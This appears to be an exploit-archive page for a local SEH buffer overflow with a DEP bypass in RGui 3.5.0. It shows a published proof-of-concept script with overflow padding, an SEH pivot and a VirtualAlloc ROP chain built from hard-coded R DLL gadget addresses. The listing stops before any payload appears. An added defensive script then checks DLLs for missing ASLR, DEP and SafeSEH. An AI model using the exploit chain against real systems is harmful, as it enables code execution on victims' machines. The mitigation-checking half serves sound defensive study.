Rgui 3.5.0 local buffer overflow (seh)(dep bypass) Vulnerability / Exploit
Discovered: 2019-01-10 | Type: local | Platform: windows
This exploit / vulnerability (Rgui 3.5.0 local buffer overflow (SEH)(DEP bypass)) is published for educational purposes only; if you use it, you do so at your own risk.
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-09-2018
# Vulnerable Software: RGui 3.5.0
# Vendor Homepage: https://www.r-project.org/
# Version: 3.5.0
# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
# Tested On: Windows 7 x86
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
# this was fixed in 3.5.1
#
# PoC:
# 1. generate rgui350dep.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste rgui350dep.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
import struct

filename = "rgui350dep.txt"

junk = "A" * 904

# {pivot 2556 / 0x9fc}
# ADD ESP,9EC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Rgraphapp.dll]
seh = struct.pack('<L', 0x637561a2)

# adjust
nops = "\x90" * 40

# ROP Chain for VirtualAlloc()
# !mona rop -cpb "\x00\x0a\x0d\x0e"
# rop chain generated with mona.py - www.corelan.be
def create_rop_chain():
    rop_gadgets = [
        0x6c931aaa,  # POP EAX # RETN [R.dll]
        0x6e759b5c,  # ptr to &VirtualAlloc() [IAT R.dll]
        0x6ff41ce5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
        0x6c969986,  # XCHG EAX,ESI # RETN [R.dll]
        0x6c05596c,  # POP EBP # RETN [Rlapack.dll]
        0x6cb9bc4a,  # & call esp [R.dll]
        0x6c931b1a,  # POP EAX # RETN [R.dll]
        0xffffffff,  # Value to negate, will become 0x00000001
        0x63742b7f,  # NEG EAX # RETN [Rgraphapp.dll]
        0x63747d47,  # XCHG EAX,EBX # RETN [Rgraphapp.dll]
        0x63977f84,  # POP EAX # RETN [graphics.dll]
        0xa4e74b7d,  # put delta into eax (-> put 0x00001000 into edx)
        0x6c92e13a,  # ADD EAX,5B18C483 # RETN [R.dll]
        0x6c9f4bca,  # XCHG EAX,EDX # RETN [R.dll]
        0x713811b8,  # POP ECX # RETN [stats.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7136d670,  # NEG ECX # RETN [stats.dll]
        0x6cb2601a,  # POP EDI # RETN [R.dll]
        0x6375fe5c,  # RETN (ROP NOP) [Rgraphapp.dll]
        0x63976123,  # POP EAX # RETN [graphics.dll]
        0x90909090,  # nop
        0x6ff24de3,  # PUSHAD # RETN [grDevices.dll]
    ]
    # Python 2: struct.pack returns str, so the gadgets concatenate into a raw byte string
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
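The chain above only works because every gadget and the VirtualAlloc IAT pointer sit at hard-coded addresses inside R.dll, Rgraphapp.dll, grDevices.dll, Rlapack.dll, graphics.dll and stats.dll, and because an overwritten SEH record is allowed to point into those modules. From a defender's side the useful question is which images in an installation were built without ASLR (DYNAMICBASE), without DEP opt-in (NXCOMPAT) and without SafeSEH. The following script is an added example written for this page, not part of the published exploit or of the R project; it parses the PE optional header itself so it runs without third-party modules, and it only checks for the presence of the Load Config directory, so a module reporting "no SafeSEH" here is a candidate for a fuller handler-table check, not a confirmed finding. The `build_test_pe` helper constructs a minimal, non-loadable PE header purely as offline sample input.

```python
import os
import struct
import sys

# IMAGE_DLLCHARACTERISTICS bits from the PE optional header (winnt.h).
DYNAMIC_BASE = 0x0040   # ASLR: the image may be relocated at load time
NX_COMPAT = 0x0100      # image opts in to DEP (non-executable data pages)
NO_SEH = 0x0400         # image declares that it contains no SEH handlers at all

IMAGE_FILE_DLL = 0x2000
LOAD_CONFIG_INDEX = 10  # data directory slot of IMAGE_LOAD_CONFIG_DIRECTORY


def pe_mitigations(data):
    """Parse a PE image held in bytes and report its compile-time mitigations."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 in both PE32 and PE32+ optional headers.
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    # NumberOfRvaAndSizes is at 92 (PE32) or 108 (PE32+); the directories follow it.
    nrva_off = 92 if magic == 0x10B else 108
    (nrva,) = struct.unpack_from("<I", data, opt + nrva_off)
    load_cfg_rva = load_cfg_size = 0
    if nrva > LOAD_CONFIG_INDEX:
        load_cfg_rva, load_cfg_size = struct.unpack_from(
            "<II", data, opt + nrva_off + 4 + LOAD_CONFIG_INDEX * 8)
    return {
        "pe32plus": magic == 0x20B,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "dynamic_base": bool(dll_chars & DYNAMIC_BASE),
        "nx_compat": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        # SafeSEH needs a Load Config directory carrying the handler table; without
        # the directory the loader has no table to validate an SEH record against.
        "has_load_config": load_cfg_rva != 0 and load_cfg_size != 0,
    }


def assess(name, info):
    """Turn the flags into findings that matter for an SEH-overwrite plus ROP scenario."""
    findings = []
    if not info["dynamic_base"]:
        findings.append("%s: DYNAMICBASE unset, fixed load address keeps gadget "
                        "and IAT pointer addresses stable across runs" % name)
    if not info["nx_compat"]:
        findings.append("%s: NXCOMPAT unset, process may run without DEP unless "
                        "DEP is enforced system-wide" % name)
    if not info["no_seh"] and not info["has_load_config"]:
        findings.append("%s: no Load Config directory, so no SafeSEH handler "
                        "table; an overwritten SEH record may point into it" % name)
    return findings


def build_test_pe(dll_chars, with_load_config):
    """Constructed sample: a minimal PE32 header (not loadable) for offline testing."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)  # i386 DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    if with_load_config:
        struct.pack_into("<II", opt, 96 + LOAD_CONFIG_INDEX * 8, 0x1000, 0x40)
    return dos + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    # Usage: python check_pe_mitigations.py <path to R install>\bin\i386\*.dll
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for line in assess(os.path.basename(path), pe_mitigations(fh.read())):
                print(line)
```

Run it against the DLLs of an installed R (after patching to 3.5.1, which the exploit header says fixed the overflow, the module flags are still worth knowing, since a future bug in the same code would reuse them). A module with all three findings is exactly the shape the chain above depends on; an empty findings list means the image at least opts in to ASLR and DEP and ships a Load Config directory.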